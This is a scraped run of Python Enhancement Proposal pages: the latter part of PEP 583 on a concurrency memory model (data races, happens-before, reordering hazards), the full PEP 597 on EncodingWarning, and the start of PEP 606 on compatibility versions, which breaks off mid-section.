module variables (often called “globals” when accessed from within
the module), class variables, instance variables (also known as
fields), and local variables. All of these can be shared between
threads (the local variables if they’re saved into a closure).
The object in which the variables are scoped notionally has a
dict whose keys are the variables’ names.
ObjectA collection of instance variables (a.k.a. fields) and methods.
At least, that’ll do for this PEP.
Program OrderThe order that actions (reads and writes) happen within a thread,
which is very similar to the order they appear in the text.
Conflicting actionsTwo actions on the same variable, at least one of which is a write.
Data raceA situation in which two conflicting actions happen at the same
time. “The same time” is defined by the memory model.
Two simple memory models
Before talking about the details of data races and the surprising
behaviors they produce, I’ll present two simple memory models. The
first is probably too strong for Python, and the second is probably
too weak.
Sequential Consistency
In a sequentially-consistent concurrent execution, actions appear to
happen in a global total order with each read of a particular variable
seeing the value written by the last write that affected that
variable. The total order for actions must be consistent with the
program order. A program has a data race on a given input when one of
its sequentially consistent executions puts two conflicting actions
next to each other.
This is the easiest memory model for humans to understand, although it
doesn’t eliminate all confusion, since operations can be split in odd
places.
Happens-before consistency
The program contains a collection of synchronization actions, which
in Python currently include lock acquires and releases and thread
starts and joins. Synchronization actions happen in a global total
order that is consistent with the program order (they don’t have to
happen in a total order, but it simplifies the description of the
model). A lock release synchronizes with all later acquires of the
same lock. Similarly, given t = threading.Thread(target=worker):
A call to t.start() synchronizes with the first statement in
worker().
The return from worker() synchronizes with the return from
t.join().
If the return from t.start() happens before (see below) a call
to t.isAlive() that returns False, the return from
worker() synchronizes with that call.
We call the source of the synchronizes-with edge a release operation
on the relevant variable, and we call the target an acquire operation.
The happens before order is the transitive closure of the program
order with the synchronizes-with edges. That is, action A happens
before action B if:
A falls before B in the program order (which means they run in the
same thread)
A synchronizes with B
You can get to B by following happens-before edges from A.
An execution of a program is happens-before consistent if each read
R sees the value of a write W to the same variable such that:
R does not happen before W, and
There is no other write V that overwrote W before R got a
chance to see it. (That is, it can’t be the case that W happens
before V happens before R.)
You have a data race if two conflicting actions aren’t related by
happens-before.
An example
Let’s use the rules from the happens-before model to prove that the
following program prints “[7]”:
class Queue:
def __init__(self):
self.l = []
self.cond = threading.Condition()
def get():
with self.cond:
while not self.l:
self.cond.wait()
ret = self.l[0]
self.l = self.l[1:]
return ret
def put(x):
with self.cond:
self.l.append(x)
self.cond.notify()
myqueue = Queue()
def worker1():
x = [7]
myqueue.put(x)
def worker2():
y = myqueue.get()
print y
thread1 = threading.Thread(target=worker1)
thread2 = threading.Thread(target=worker2)
thread2.start()
thread1.start()
Because myqueue is initialized in the main thread before
thread1 or thread2 is started, that initialization happens
before worker1 and worker2 begin running, so there’s no way
for either to raise a NameError, and both myqueue.l and
myqueue.cond are set to their final objects.
The initialization of x in worker1 happens before it calls
myqueue.put(), which happens before it calls
myqueue.l.append(x), which happens before the call to
myqueue.cond.release(), all because they run in the same
thread.
In worker2, myqueue.cond will be released and re-acquired
until myqueue.l contains a value (x). The call to
myqueue.cond.release() in worker1 happens before that last
call to myqueue.cond.acquire() in worker2.
That last call to myqueue.cond.acquire() happens before
myqueue.get() reads myqueue.l, which happens before
myqueue.get() returns, which happens before print y, again
all because they run in the same thread.
Because happens-before is transitive, the list initially stored in
x in thread1 is initialized before it is printed in thread2.
Usually, we wouldn’t need to look all the way into a thread-safe
queue’s implementation in order to prove that uses were safe. Its
interface would specify that puts happen before gets, and we’d reason
directly from that.
Surprising behaviors with races
Lots of strange things can happen when code has data races. It’s easy
to avoid all of these problems by just protecting shared variables
with locks. This is not a complete list of race hazards; it’s just a
collection that seem relevant to Python.
In all of these examples, variables starting with r are local
variables, and other variables are shared between threads.
Zombie values
This example comes from the Java memory model:
Initially p is q and p.x == 0.
Thread 1
Thread 2
r1 = p
r6 = p
r2 = r1.x
r6.x = 3
r3 = q
r4 = r3.x
r5 = r1.x
Can produce r2 == r5 == 0 but r4 == 3, proving that
p.x went from 0 to 3 and back to 0.
A good compiler would like to optimize out the redundant load of
p.x in initializing r5 by just re-using the value already
loaded into r2. We get the strange result if thread 1 sees memory
in this order:
Evaluation
Computes
Why
r1 = p
r2 = r1.x
r2 == 0
r3 = q
r3 is p
p.x = 3
Side-effect of thread 2
r4 = r3.x
r4 == 3
r5 = r2
r5 == 0
Optimized from r5 = r1.x because r2 == r1.x.
Inconsistent Orderings
From N2177: Sequential Consistency for Atomics, and also known as
Independent Read of Independent Write (IRIW).
Initially, a == b == 0.
Thread 1
Thread 2
Thread 3
Thread 4
r1 = a
r3 = b
a = 1
b = 1
r2 = b
r4 = a
We may get r1 == r3 == 1 and r2 == r4 == 0, proving both
that a was written before b (thread 1’s data), and that
b was written before a (thread 2’s data). See Special
Relativity for a
real-world example.
This can happen if thread 1 and thread 3 are running on processors
that are close to each other, but far away from the processors that
threads 2 and 4 are running on and the writes are not being
transmitted all the way across the machine before becoming visible to
nearby threads.
Neither acquire/release semantics nor explicit memory barriers can
help with this. Making the orders consistent without locking requires
detailed knowledge of the architecture’s memory model, but Java
requires it for volatiles so we could use documentation aimed at its
implementers.
A happens-before race that’s not a sequentially-consistent race
From the POPL paper about the Java memory model [#JMM-popl].
Initially, x == y == 0.
Thread 1
Thread 2
r1 = x
r2 = y
if r1 != 0:
if r2 != 0:
y = 42
x = 42
Can r1 == r2 == 42???
In a sequentially-consistent execution, there’s no way to get an
adjacent read and write to the same variable, so the program should be
considered correctly synchronized (albeit fragile), and should only
produce r1 == r2 == 0. However, the following execution is
happens-before consistent:
Statement
Value
Thread
r1 = x
42
1
if r1 != 0:
true
1
y = 42
1
r2 = y
42
2
if r2 != 0:
true
2
x = 42
2
WTF, you are asking yourself. Because there were no inter-thread
happens-before edges in the original program, the read of x in thread
1 can see any of the writes from thread 2, even if they only happened
because the read saw them. There are data races in the
happens-before model.
We don’t want to allow this, so the happens-before model isn’t enough
for Python. One rule we could add to happens-before that would
prevent this execution is:
If there are no data races in any sequentially-consistent
execution of a program, the program should have sequentially
consistent semantics.
Java gets this rule as a theorem, but Python may not want all of the
machinery you need to prove it.
Self-justifying values
Also from the POPL paper about the Java memory model [#JMM-popl].
Initially, x == y == 0.
Thread 1
Thread 2
r1 = x
r2 = y
y = r1
x = r2
Can x == y == 42???
In a sequentially consistent execution, no. In a happens-before
consistent execution, yes: The read of x in thread 1 is allowed to see
the value written in thread 2 because there are no happens-before
relations between the threads. This could happen if the compiler or
processor transforms the code into:
Thread 1
Thread 2
y = 42
r2 = y
r1 = x
x = r2
if r1 != 42:
y = r1
It can produce a security hole if the speculated value is a secret
object, or points to the memory that an object used to occupy. Java
cares a lot about such security holes, but Python may not.
Uninitialized values (direct)
From several classic double-checked locking examples.
Initially, d == None.
Thread 1
Thread 2
while not d: pass
d = [3, 4]
assert d[1] == 4
This could raise an IndexError, fail the assertion, or, without
some care in the implementation, cause a crash or other undefined
behavior.
Thread 2 may actually be implemented as:
r1 = list()
r1.append(3)
r1.append(4)
d = r1
Because the assignment to d and the item assignments are independent,
the compiler and processor may optimize that to:
r1 = list()
d = r1
r1.append(3)
r1.append(4)
Which is obviously incorrect and explains the IndexError. If we then
look deeper into the implementation of r1.append(3), we may find
that it and d[1] cannot run concurrently without causing their own
race conditions. In CPython (without the GIL), those race conditions
would produce undefined behavior.
There’s also a subtle issue on the reading side that can cause the
value of d[1] to be out of date. Somewhere in the implementation of
list, it stores its contents as an array in memory. This array may
happen to be in thread 1’s cache. If thread 1’s processor reloads
d from main memory without reloading the memory that ought to
contain the values 3 and 4, it could see stale values instead. As far
as I know, this can only actually happen on Alphas and maybe Itaniums,
and we probably have to prevent it anyway to avoid crashes.
Uninitialized values (flag)
From several more double-checked locking examples.
Initially, d == dict() and initialized == False.
Thread 1
Thread 2
while not initialized: pass
d[‘a’] = 3
r1 = d[‘a’]
initialized = True
r2 = r1 == 3
assert r2
This could raise a KeyError, fail the assertion, or, without some
care in the implementation, cause a crash or other undefined
behavior.
Because d and initialized are independent (except in the
programmer’s mind), the compiler and processor can rearrange these
almost arbitrarily, except that thread 1’s assertion has to stay after
the loop.
Inconsistent guarantees from relying on data dependencies
This is a problem with Java final variables and the proposed
data-dependency ordering in C++0x.
First execute:g = []
def Init():
g.extend([1,2,3])
return [1,2,3]
h = None
Then in two threads:
Thread 1
Thread 2
while not h: pass
r1 = Init()
assert h == [1,2,3]
freeze(r1)
assert h == g
h = r1
If h has semantics similar to a Java final variable (except
for being write-once), then even though the first assertion is
guaranteed to succeed, the second could fail.
Data-dependent guarantees like those final provides only work if
the access is through the final variable. It’s not even safe to
access the same object through a different route. Unfortunately,
because of how processors work, final’s guarantees are only cheap when
they’re weak.
The rules for Python
The first rule is that Python interpreters can’t crash due to race
conditions in user code. For CPython, this means that race conditions
can’t make it down into C. For Jython, it means that
NullPointerExceptions can’t escape the interpreter.
Presumably we also want a model at least as strong as happens-before
consistency because it lets us write a simple description of how
concurrent queues and thread launching and joining work.
Other rules are more debatable, so I’ll present each one with pros and
cons.
Data-race-free programs are sequentially consistent
We’d like programmers to be able to reason about their programs as if
they were sequentially consistent. Since it’s hard to tell whether
you’ve written a happens-before race, we only want to require
programmers to prevent sequential races. The Java model does this
through a complicated definition of causality, but if we don’t want to
include that, we can just assert this property directly.
No security holes from out-of-thin-air reads
If the program produces a self-justifying value, it could expose
access to an object that the user would rather the program not see.
Again, Java’s model handles this with the causality definition. We
might be able to prevent these security problems by banning
speculative writes to shared variables, but I don’t have a proof of
that, and Python may not need those security guarantees anyway.
Restrict reorderings instead of defining happens-before
The .NET [#CLR-msdn] and x86 [#x86-model] memory models are based on
defining which reorderings compilers may allow. I think that it’s
easier to program to a happens-before model than to reason about all
of the possible reorderings of a program, and it’s easier to insert
enough happens-before edges to make a program correct, than to insert
enough memory fences to do the same thing. So, although we could
layer some reordering restrictions on top of the happens-before base,
I don’t think Python’s memory model should be entirely reordering
restrictions.
Atomic, unordered assignments
Assignments of primitive types are already atomic. If you assign
3<<72 + 5 to a variable, no thread can see only part of the value.
Jeremy Manson suggested that we extend this to all objects. This
allows compilers to reorder operations to optimize them, without
allowing some of the more confusing uninitialized values. The
basic idea here is that when you assign a shared variable, readers
can’t see any changes made to the new value before the assignment, or
to the old value after the assignment. So, if we have a program like:
Initially, (d.a, d.b) == (1, 2), and (e.c, e.d) == (3, 4).
We also have class Obj(object): pass.
Thread 1
Thread 2
r1 = Obj()
r3 = d
r1.a = 3
r4, r5 = r3.a, r3.b
r1.b = 4
r6 = e
d = r1
r7, r8 = r6.c, r6.d
r2 = Obj()
r2.c = 6
r2.d = 7
e = r2
(r4, r5) can be (1, 2) or (3, 4) but nothing else, and
(r7, r8) can be either (3, 4) or (6, 7) but nothing
else. Unlike if writes were releases and reads were acquires,
it’s legal for thread 2 to see (e.c, e.d) == (6, 7) and (d.a,
d.b) == (1, 2) (out of order).
This allows the compiler a lot of flexibility to optimize without
allowing users to see some strange values. However, because it relies
on data dependencies, it introduces some surprises of its own. For
example, the compiler could freely optimize the above example to:
Thread 1
Thread 2
r1 = Obj()
r3 = d
r2 = Obj()
r6 = e
r1.a = 3
r4, r7 = r3.a, r6.c
r2.c = 6
r5, r8 = r3.b, r6.d
r2.d = 7
e = r2
r1.b = 4
d = r1
As long as it didn’t let the initialization of e move above any of
the initializations of members of r2, and similarly for d and
r1.
This also helps to ground happens-before consistency. To see the
problem, imagine that the user unsafely publishes a reference to an
object as soon as she gets it. The model needs to constrain what
values can be read through that reference. Java says that every field
is initialized to 0 before anyone sees the object for the first time,
but Python would have trouble defining “every field”. If instead we
say that assignments to shared variables have to see a value at least
as up to date as when the assignment happened, then we don’t run into
any trouble with early publication.
Two tiers of guarantees
Most other languages with any guarantees for unlocked variables
distinguish between ordinary variables and volatile/atomic variables.
They provide many more guarantees for the volatile ones. Python can’t
easily do this because we don’t declare variables. This may or may
not matter, since python locks aren’t significantly more expensive
than ordinary python code. If we want to get those tiers back, we could:
Introduce a set of atomic types similar to Java’s [5]
or C++’s [6]. Unfortunately, we couldn’t assign to
them with =.
Without requiring variable declarations, we could also specify that
all of the fields on a given object are atomic.
Extend the __slots__ mechanism [7] with a parallel
__volatiles__ list, and maybe a __finals__ list.
Sequential Consistency
We could just adopt sequential consistency for Python.
This avoids all of the hazards mentioned above,
but it prohibits lots of optimizations too.
As far as I know, this is the current model of CPython,
but if CPython learned to optimize out some variable reads,
it would lose this property.
If we adopt this, Jython’s dict implementation may no longer be
able to use ConcurrentHashMap because that only promises to create
appropriate happens-before edges, not to be sequentially consistent
(although maybe the fact that Java volatiles are totally ordered
carries over). Both Jython and IronPython would probably need to use
AtomicReferenceArray
or the equivalent for any __slots__ arrays.
Adapt the x86 model
The x86 model is:
Loads are not reordered with other loads.
Stores are not reordered with other stores.
Stores are not reordered with older loads.
Loads may be reordered with older stores to different locations but
not with older stores to the same location.
In a multiprocessor system, memory ordering obeys causality (memory
ordering respects transitive visibility).
In a multiprocessor system, stores to the same location have a
total order.
In a multiprocessor system, locked instructions have a total order.
Loads and stores are not reordered with locked instructions.
In acquire/release terminology, this appears to say that every store
is a release and every load is an acquire. This is slightly weaker
than sequential consistency, in that it allows inconsistent
orderings, but it disallows zombie values and the compiler
optimizations that produce them. We would probably want to weaken the
model somehow to explicitly allow compilers to eliminate redundant
variable reads. The x86 model may also be expensive to implement on
other platforms, although because x86 is so common, that may not
matter much.
Upgrading or downgrading to an alternate model
We can adopt an initial memory model without totally restricting
future implementations. If we start with a weak model and want to get
stronger later, we would only have to change the implementations, not
programs. Individual implementations could also guarantee a stronger
memory model than the language demands, although that could hurt
interoperability. On the other hand, if we start with a strong model
and want to weaken it later, we can add a from __future__ import
weak_memory statement to declare that some modules are safe.
Implementation Details
The required model is weaker than any particular implementation. This
section tries to document the actual guarantees each implementation
provides, and should be updated as the implementations change.
CPython
Uses the GIL to guarantee that other threads don’t see funny
reorderings, and does few enough optimizations that I believe it’s
actually sequentially consistent at the bytecode level. Threads can
switch between any two bytecodes (instead of only between statements),
so two threads that concurrently execute:
i = i + 1
with i initially 0 could easily end up with i==1 instead
of the expected i==2. If they execute:
i += 1
instead, CPython 2.6 will always give the right answer, but it’s easy
to imagine another implementation in which this statement won’t be
atomic.
PyPy
Also uses a GIL, but probably does enough optimization to violate
sequential consistency. I know very little about this implementation.
Jython
Provides true concurrency under the Java memory model and stores
all object fields (except for those in __slots__?) in a
ConcurrentHashMap,
which provides fairly strong ordering guarantees. Local variables in
a function may have fewer guarantees, which would become visible if
they were captured into a closure that was then passed to another
thread.
IronPython
Provides true concurrency under the CLR memory model, which probably
protects it from uninitialized values. IronPython uses a locked
map to store object fields, providing at least as many guarantees as
Jython.
References
[1]
The Java Memory Model, by Jeremy Manson, Bill Pugh, and
Sarita Adve
(http://www.cs.umd.edu/users/jmanson/java/journal.pdf). This paper
is an excellent introduction to memory models in general and has
lots of examples of compiler/processor optimizations and the
strange program behaviors they can produce.
[2]
N2480: A Less Formal Explanation of the
Proposed C++ Concurrency Memory Model, Hans Boehm
(http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2480.html)
[3]
Memory Models: Understand the Impact of Low-Lock
Techniques in Multithreaded Apps, Vance Morrison
(http://msdn2.microsoft.com/en-us/magazine/cc163715.aspx)
[4]
Intel(R) 64 Architecture Memory Ordering White Paper
(http://www.intel.com/products/processor/manuals/318147.pdf)
[5]
Package java.util.concurrent.atomic
(http://java.sun.com/javase/6/docs/api/java/util/concurrent/atomic/package-summary.html)
[6]
C++ Atomic Types and Operations, Hans Boehm and
Lawrence Crowl
(http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2427.html)
[7]
__slots__ (http://docs.python.org/ref/slots.html)
[8]
Alternatives to SC, a thread on the cpp-threads mailing list,
which includes lots of good examples.
(http://www.decadentplace.org.uk/pipermail/cpp-threads/2007-January/001287.html)
[9]
python-safethread, a patch by Adam Olsen for CPython
that removes the GIL and statically guarantees that all objects
shared between threads are consistently
locked. (http://code.google.com/p/python-safethread/)
Acknowledgements
Thanks to Jeremy Manson and Alex Martelli for detailed discussions on
what this PEP should look like.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 583 – A Concurrency Memory Model for Python | Informational | This PEP describes how Python programs may behave in the presence of
concurrent reads and writes to shared variables from multiple threads.
We use a happens before relation to define when variable accesses
are ordered or concurrent. Nearly all programs should simply use locks
to guard their shared variables, and this PEP highlights some of the
strange things that can happen when they don’t, but programmers often
assume that it’s ok to do “simple” things without locking, and it’s
somewhat unpythonic to let the language surprise them. Unfortunately,
avoiding surprise often conflicts with making Python run quickly, so
this PEP tries to find a good tradeoff between the two. |
PEP 597 – Add optional EncodingWarning
Author:
Inada Naoki <songofacandy at gmail.com>
Status:
Final
Type:
Standards Track
Created:
05-Jun-2019
Python-Version:
3.10
Table of Contents
Abstract
Motivation
Using the default encoding is a common mistake
Explicit way to use locale-specific encoding
Prepare to change the default encoding to UTF-8
Specification
EncodingWarning
Options to enable the warning
encoding="locale"
io.text_encoding()
Affected standard library modules
Rationale
Opt-in warning
“locale” is not a codec alias
Backward Compatibility
Forward Compatibility
How to Teach This
For new users
For experienced users
Reference Implementation
Discussions
References
Copyright
Abstract
Add a new warning category EncodingWarning. It is emitted when the
encoding argument to open() is omitted and the default
locale-specific encoding is used.
The warning is disabled by default. A new -X warn_default_encoding
command-line option and a new PYTHONWARNDEFAULTENCODING environment
variable can be used to enable it.
A "locale" argument value for encoding is added too. It
explicitly specifies that the locale encoding should be used, silencing
the warning.
Motivation
Using the default encoding is a common mistake
Developers using macOS or Linux may forget that the default encoding
is not always UTF-8.
For example, using long_description = open("README.md").read() in
setup.py is a common mistake. Many Windows users cannot install
such packages if there is at least one non-ASCII character
(e.g. emoji, author names, copyright symbols, and the like)
in their UTF-8-encoded README.md file.
Of the 4000 most downloaded packages from PyPI, 489 use non-ASCII
characters in their README, and 82 fail to install from source on
non-UTF-8 locales due to not specifying an encoding for a non-ASCII
file. [1]
Another example is logging.basicConfig(filename="log.txt").
Some users might expect it to use UTF-8 by default, but the locale
encoding is actually what is used. [2]
Even Python experts may assume that the default encoding is UTF-8.
This creates bugs that only happen on Windows; see [3], [4], [5],
and [6] for example.
Emitting a warning when the encoding argument is omitted will help
find such mistakes.
Explicit way to use locale-specific encoding
open(filename) isn’t explicit about which encoding is expected:
If ASCII is assumed, this isn’t a bug, but may result in decreased
performance on Windows, particularly with non-Latin-1 locale encodings
If UTF-8 is assumed, this may be a bug or a platform-specific script
If the locale encoding is assumed, the behavior is as expected
(but could change if future versions of Python modify the default)
From this point of view, open(filename) is not readable code.
encoding=locale.getpreferredencoding(False) can be used to
specify the locale encoding explicitly, but it is too long and easy
to misuse (e.g. one can forget to pass False as its argument).
This PEP provides an explicit way to specify the locale encoding.
Prepare to change the default encoding to UTF-8
Since UTF-8 has become the de-facto standard text encoding,
we might default to it for opening files in the future.
However, such a change will affect many applications and libraries.
If we start emitting DeprecationWarning everywhere the encoding
argument is omitted, it will be too noisy and painful.
Although this PEP doesn’t propose changing the default encoding,
it will help enable that change by:
Reducing the number of omitted encoding arguments in libraries
before we start emitting a DeprecationWarning by default.
Allowing users to pass encoding="locale" to suppress
the current warning and any DeprecationWarning added in the future,
as well as retaining consistent behavior if later Python versions
change the default, ensuring support for any Python version >=3.10.
Specification
EncodingWarning
Add a new EncodingWarning warning class as a subclass of
Warning. It is emitted when the encoding argument is omitted and
the default locale-specific encoding is used.
Options to enable the warning
The -X warn_default_encoding option and the
PYTHONWARNDEFAULTENCODING environment variable are added. They
are used to enable EncodingWarning.
sys.flags.warn_default_encoding is also added. The flag is true when
EncodingWarning is enabled.
When the flag is set, io.TextIOWrapper(), open() and other
modules using them will emit EncodingWarning when the encoding
argument is omitted.
Since EncodingWarning is a subclass of Warning, they are
shown by default (if the warn_default_encoding flag is set), unlike
DeprecationWarning.
encoding="locale"
io.TextIOWrapper will accept "locale" as a valid argument to
encoding. It has the same meaning as the current encoding=None,
except that io.TextIOWrapper doesn’t emit EncodingWarning when
encoding="locale" is specified.
io.text_encoding()
io.text_encoding() is a helper for functions with an
encoding=None parameter that pass it to io.TextIOWrapper() or
open().
A pure Python implementation will look like this:
def text_encoding(encoding, stacklevel=1):
"""A helper function to choose the text encoding.
When *encoding* is not None, just return it.
Otherwise, return the default text encoding (i.e. "locale").
This function emits an EncodingWarning if *encoding* is None and
sys.flags.warn_default_encoding is true.
This function can be used in APIs with an encoding=None parameter
that pass it to TextIOWrapper or open.
However, please consider using encoding="utf-8" for new APIs.
"""
if encoding is None:
if sys.flags.warn_default_encoding:
import warnings
warnings.warn(
"'encoding' argument not specified.",
EncodingWarning, stacklevel + 2)
encoding = "locale"
return encoding
For example, pathlib.Path.read_text() can use it like this:
def read_text(self, encoding=None, errors=None):
encoding = io.text_encoding(encoding)
with self.open(mode='r', encoding=encoding, errors=errors) as f:
return f.read()
By using io.text_encoding(), EncodingWarning is emitted for
the caller of read_text() instead of read_text() itself.
Affected standard library modules
Many standard library modules will be affected by this change.
Most APIs accepting encoding=None will use io.text_encoding()
as written in the previous section.
Where using the locale encoding as the default encoding is reasonable,
encoding="locale" will be used instead. For example,
the subprocess module will use the locale encoding as the default
for pipes.
Many tests use open() without encoding specified to read
ASCII text files. They should be rewritten with encoding="ascii".
Rationale
Opt-in warning
Although DeprecationWarning is suppressed by default, always
emitting DeprecationWarning when the encoding argument is
omitted would be too noisy.
Noisy warnings may lead developers to dismiss the
DeprecationWarning.
“locale” is not a codec alias
We don’t add “locale” as a codec alias because the locale can be
changed at runtime.
Additionally, TextIOWrapper checks os.device_encoding()
when encoding=None. This behavior cannot be implemented in
a codec.
Backward Compatibility
The new warning is not emitted by default, so this PEP is 100%
backwards-compatible.
Forward Compatibility
Passing "locale" as the argument to encoding is not
forward-compatible. Code using it will not work on Python older than
3.10, and will instead raise LookupError: unknown encoding: locale.
Until developers can drop Python 3.9 support, EncodingWarning
can only be used for finding missing encoding="utf-8" arguments.
How to Teach This
For new users
Since EncodingWarning is used to write cross-platform code,
there is no need to teach it to new users.
We can just recommend using UTF-8 for text files and using
encoding="utf-8" when opening them.
For experienced users
Using open(filename) to read text files encoded in UTF-8 is a
common mistake. It may not work on Windows because UTF-8 is not the
default encoding.
You can use -X warn_default_encoding or
PYTHONWARNDEFAULTENCODING=1 to find this type of mistake.
Omitting the encoding argument is not a bug when opening text files
encoded in the locale encoding, but encoding="locale" is recommended
in Python 3.10 and later because it is more explicit.
Reference Implementation
https://github.com/python/cpython/pull/19481
Discussions
The latest discussion thread is:
https://mail.python.org/archives/list/[email protected]/thread/SFYUP2TWD5JZ5KDLVSTZ44GWKVY4YNCV/
Why not implement this in linters?
encoding="locale" and io.text_encoding() must be implemented
in Python.
It is difficult to find all callers of functions wrapping
open() or TextIOWrapper() (see the io.text_encoding()
section).
Many developers will not use the option.
Some will, and report the warnings to libraries they use,
so the option is worth it even if many developers don’t enable it.
For example, I found [7] and [8] by running
pip install -U pip, and [9] by running tox
with the reference implementation. This demonstrates how this
option can be used to find potential issues.
References
[1]
“Packages can’t be installed when encoding is not UTF-8”
(https://github.com/methane/pep597-pypi-ascii)
[2]
“Logging - Inconsistent behaviour when handling unicode”
(https://bugs.python.org/issue37111)
[3]
Packaging tutorial in packaging.python.org didn’t specify
encoding to read a README.md
(https://github.com/pypa/packaging.python.org/pull/682)
[4]
json.tool had used locale encoding to read JSON files.
(https://bugs.python.org/issue33684)
[5]
site: Potential UnicodeDecodeError when handling pth file
(https://bugs.python.org/issue33684)
[6]
pypa/pip: “Installing packages fails if Python 3 installed
into path with non-ASCII characters”
(https://github.com/pypa/pip/issues/9054)
[7]
“site: Potential UnicodeDecodeError when handling pth file”
(https://bugs.python.org/issue43214)
[8]
“[pypa/pip] Use encoding option or binary mode for open()”
(https://github.com/pypa/pip/pull/9608)
[9]
“Possible UnicodeError caused by missing encoding=”utf-8””
(https://github.com/tox-dev/tox/issues/1908)
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 597 – Add optional EncodingWarning | Standards Track | Add a new warning category EncodingWarning. It is emitted when the
encoding argument to open() is omitted and the default
locale-specific encoding is used. |
PEP 606 – Python Compatibility Version
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
18-Oct-2019
Python-Version:
3.9
Table of Contents
Abstract
Rationale
The need to evolve frequently
Partial compatibility to minimize the Python maintenance burden
Cases excluded from backward compatibility
Upgrading a project to a newer Python
Cleaning up Python and DeprecationWarning
Redistribute the maintenance burden
Examples of backward compatibility
collections ABC aliases
Deprecated open() “U” mode
Specification
sys functions
Command line
Backwards Compatibility
Security Implications
Alternatives
Provide a workaround for each incompatible change
Handle backward compatibility in the parser
from __future__ import python38_syntax
Update cache_tag
Temporary moratorium on incompatible changes
PEP 387
PEP 497
Examples of incompatible changes
Python 3.8
Python 3.7
Micro releases
References
Copyright
Abstract
Add sys.set_python_compat_version(version) to enable partial
compatibility with requested Python version. Add
sys.get_python_compat_version().
Modify a few functions in the standard library to implement partial
compatibility with Python 3.8.
Add sys.set_python_min_compat_version(version) to deny backward
compatibility with Python versions older than version.
Add -X compat_version=VERSION and -X min_compat_version=VERSION
command line options. Add PYTHONCOMPATVERSION and
PYTHONCOMPATMINVERSION environment variables.
Rationale
The need to evolve frequently
To remain relevant and useful, Python has to evolve frequently; some
enhancements require incompatible changes. Any incompatible change can
break an unknown number of Python projects. Developers can decide to
not implement a feature because of that.
Users want to get the latest Python version to obtain new features and
better performance. A few incompatible changes can prevent them from using their
applications on the latest Python version.
This PEP proposes to add a partial compatibility with old Python
versions as a tradeoff to fit both use cases.
The main issue with the migration from Python 2 to Python 3 is not that
Python 3 is backward incompatible, but how incompatible changes were
introduced.
Partial compatibility to minimize the Python maintenance burden
While technically it would be possible to provide full compatibility
with old Python versions, this PEP proposes to minimize the number of
functions handling backward compatibility to reduce the maintenance
burden of the Python project (CPython).
Each change introducing backport compatibility to a function should be
properly discussed to estimate the maintenance cost in the long-term.
Backward compatibility code will be dropped on each Python release, on a
case-by-case basis. Each compatibility function can be supported for a
different number of Python releases depending on its maintenance cost
and the estimated risk (number of broken projects) if it’s removed.
The maintenance cost does not only come from the code implementing the
backward compatibility, but also comes from the additional tests.
Cases excluded from backward compatibility
The performance overhead of any compatibility code must be low when
sys.set_python_compat_version() is not called.
The C API is out of the scope of this PEP: Py_LIMITED_API macro and
the stable ABI are solving this problem differently, see the PEP 384:
Defining a Stable ABI.
Security fixes which break backward compatibility on purpose will
not get a compatibility layer; security matters more than compatibility.
For example, http.client.HTTPSConnection was modified in Python
3.4.3 to performs all the necessary certificate and hostname checks by
default. It was a deliberate change motivated by PEP 476: Enabling
certificate verification by default for stdlib http clients (bpo-22417).
The Python language does not provide backward compatibility.
Changes which are not clearly incompatible are not covered by this PEP.
For example, Python 3.9 changed the default protocol in the pickle
module to Protocol 4 which was first introduced in Python 3.4. This
change is backward compatible up to Python 3.4. There is no need to use
the Protocol 3 by default when compatibility with Python 3.8 is
requested.
The new DeprecationWarning and PendingDeprecatingWarning warnings
in Python 3.9 will not be disabled in Python 3.8 compatibility mode.
If a project runs its test suite using -Werror (treat any warning as
an error), these warnings must be fixed, or specific deprecation
warnings must be ignored on a case-by-case basis.
Upgrading a project to a newer Python
Without backward compatibility, all incompatible changes must be fixed
at once, which can be a blocker issue. It is even worse when a project
is upgraded to a newer Python which is separated by multiple releases
from the old Python.
Postponing an upgrade only makes things worse: each skipped release adds
more incompatible changes. The technical debt only steadily
increases over time.
With backward compatibility, it becomes possible to upgrade Python
increamentally in a project, without having to fix all of the issues at once.
The “all-or-nothing” is a showstopper to port large Python 2 code bases
to Python 3. The list of incompatible changes between Python 2 and
Python 3 is long, and it’s getting longer with each Python 3.x release.
Cleaning up Python and DeprecationWarning
One of the Zen of Python (PEP 20) motto is:
There should be one– and preferably only one –obvious way to do
it.
When Python evolves, new ways inevitably emerge. DeprecationWarnings
are emitted to suggest using the new way, but many developers ignore
these warnings, which are silent by default (except in the __main__
module: see the PEP 565).
Some developers simply ignore all warnings when there are too many
warnings, thus only bother with exceptions when the deprecated code is
removed.
Sometimes, supporting both ways has a minor maintenance cost, but
developers prefer to drop the old way to clean up their code. These kinds of
changes are backward incompatible.
Some developers can take the end of the Python 2 support as an
opportunity to push even more incompatible changes than usual.
Adding an opt-in backward compatibility prevents the breaking of
applications and allows developers to continue doing these cleanups.
Redistribute the maintenance burden
The backward compatibility involves authors of incompatible
changes more in the upgrade path.
Examples of backward compatibility
collections ABC aliases
collections.abc aliases to ABC classes have been removed from the
collections module in Python 3.9, after being deprecated since
Python 3.3. For example, collections.Mapping no longer exists.
In Python 3.6, aliases were created in collections/__init__.py by
from _collections_abc import *.
In Python 3.7, a __getattr__() has been added to the collections
module to emit a DeprecationWarning upon first access to an
attribute:
def __getattr__(name):
# For backwards compatibility, continue to make the collections ABCs
# through Python 3.6 available through the collections module.
# Note: no new collections ABCs were added in Python 3.7
if name in _collections_abc.__all__:
obj = getattr(_collections_abc, name)
import warnings
warnings.warn("Using or importing the ABCs from 'collections' instead "
"of from 'collections.abc' is deprecated since Python 3.3, "
"and in 3.9 it will be removed.",
DeprecationWarning, stacklevel=2)
globals()[name] = obj
return obj
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
Compatibility with Python 3.8 can be restored in Python 3.9 by adding
back the __getattr__() function, but only when backward
compatibility is requested:
def __getattr__(name):
if (sys.get_python_compat_version() < (3, 9)
and name in _collections_abc.__all__):
...
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
Deprecated open() “U” mode
The "U" mode of open() is deprecated since Python 3.4 and emits a
DeprecationWarning. bpo-37330 proposes to drop this mode:
open(filename, "rU") would raise an exception.
This change falls into the “cleanup” category: it is not required to
implement a feature.
A backward compatibility mode would be trivial to implement and would be
welcomed by users.
Specification
sys functions
